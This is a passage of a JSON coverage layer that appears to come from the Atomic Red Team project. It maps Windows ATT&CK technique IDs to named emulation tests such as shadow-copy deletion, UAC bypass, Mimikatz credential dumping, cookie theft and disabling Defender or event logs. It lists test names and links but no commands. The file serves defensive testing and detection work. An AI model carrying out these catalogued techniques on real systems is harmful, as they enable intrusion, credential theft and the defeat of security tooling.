Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":57,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via 